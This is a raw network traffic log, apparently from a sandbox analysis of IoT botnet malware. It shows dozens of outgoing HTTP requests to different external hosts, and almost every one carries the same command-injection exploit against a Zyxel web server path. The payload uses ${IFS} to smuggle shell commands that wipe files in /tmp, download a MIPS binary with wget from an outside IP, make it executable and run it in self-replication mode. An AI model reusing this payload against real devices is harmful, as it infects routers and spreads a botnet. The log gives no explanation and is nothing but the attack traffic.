                                          Jan 14, 2024 15:46:14.964169025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3951192.168.2.2336018186.79.21.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964210033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3952192.168.2.2347314173.182.233.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964266062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3953192.168.2.235380889.41.67.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964272022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3954192.168.2.235568424.203.161.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964307070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3955192.168.2.233866078.78.191.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964335918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3956192.168.2.2346442146.188.157.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964391947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3957192.168.2.233284868.214.252.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964427948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3958192.168.2.2335620155.120.15.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964504957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3959192.168.2.234516278.15.136.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964560032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3960192.168.2.233418878.149.83.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964582920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3961192.168.2.236056494.10.119.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964605093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3962192.168.2.2354330200.123.246.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964633942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3963192.168.2.234331658.37.88.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964699030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3964192.168.2.234102018.216.99.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964745045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3965192.168.2.235928096.40.130.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964782953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3966192.168.2.234647227.27.43.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964844942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3967192.168.2.2337562199.84.53.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964868069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3968192.168.2.234873286.0.213.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964906931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3969192.168.2.235515612.234.69.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964960098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3970192.168.2.234595693.177.225.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964984894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3971192.168.2.2347120149.187.130.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965017080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3972192.168.2.235376424.196.179.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965040922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3973192.168.2.2354956102.231.196.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965121031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3974192.168.2.234805649.113.169.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965147018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3975192.168.2.2355496203.146.148.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965193987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3976192.168.2.235155263.161.58.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965221882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3977192.168.2.234377847.142.48.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965280056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3978192.168.2.2358892103.202.166.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965344906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3979192.168.2.236074094.176.16.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965364933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3980192.168.2.2356828132.50.182.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965389013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3981192.168.2.2345986180.99.4.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965411901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3982192.168.2.235352042.239.180.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965471983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3983192.168.2.2337166160.128.212.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965517044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3984192.168.2.2355432121.17.224.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965522051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3985192.168.2.2347904211.241.135.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965550900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3986192.168.2.2349598115.250.165.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965595007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3987192.168.2.234635854.11.33.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965610027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3988192.168.2.2343596175.134.109.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965646982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3989192.168.2.2332786181.248.240.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965675116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3990192.168.2.2348444136.129.222.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965693951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3991192.168.2.2344028161.73.155.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965760946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3992192.168.2.235600013.59.98.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965789080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3993192.168.2.2348844140.89.25.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965848923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3994192.168.2.2335438141.177.106.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965883017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3995192.168.2.2352578148.148.171.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965913057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3996192.168.2.233665495.48.114.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.965982914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3997192.168.2.233598646.244.0.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966001034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3998192.168.2.235822266.33.60.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966042042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3999192.168.2.234875065.10.125.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966098070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4000192.168.2.2360810124.120.200.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966144085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4001192.168.2.23488784.74.58.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966178894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4002192.168.2.233931689.33.238.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966208935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4003192.168.2.2349722134.161.187.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966232061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4004192.168.2.2350980207.126.26.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966283083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4005192.168.2.2354084100.62.11.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966310978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4006192.168.2.2360524120.73.199.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966363907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4007192.168.2.2348926198.216.35.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966447115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4008192.168.2.2343244222.97.100.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966471910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4009192.168.2.2343498207.181.91.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966526985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4010192.168.2.2346444152.178.214.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966562033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4011192.168.2.235399282.237.252.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966593027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4012192.168.2.233626893.48.223.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966661930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4013192.168.2.235304880.183.88.209443
                                          TimestampBytes transferredDirectionData
